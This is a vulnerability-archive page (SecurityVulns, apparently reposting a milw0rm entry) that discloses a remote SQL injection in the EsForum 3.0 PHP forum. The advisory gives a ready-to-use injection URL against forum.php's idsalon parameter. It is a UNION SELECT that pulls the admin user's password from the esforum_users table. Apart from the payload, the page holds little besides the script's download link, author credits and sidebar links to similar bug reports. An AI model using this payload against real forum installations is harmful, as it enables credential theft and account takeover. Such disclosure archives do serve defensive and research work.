Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability

  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

  GPB bulletin board Remote file include

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:30 апреля 2007 г.
Subject:EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability

---------------------------------------------------------------------------------
----------------------------------
AYYILDIZ.ORG PreSents...


Script: EsForum 3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
*/  MEFISTO Begins. */

---------------------------------------------------------------------------------
----------------------------------
Exploit:

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,
6/**/FROM/**/esforum_users%20where%20user_id=1/*

---------------------------------------------------------------------------------
----------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-04-26]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server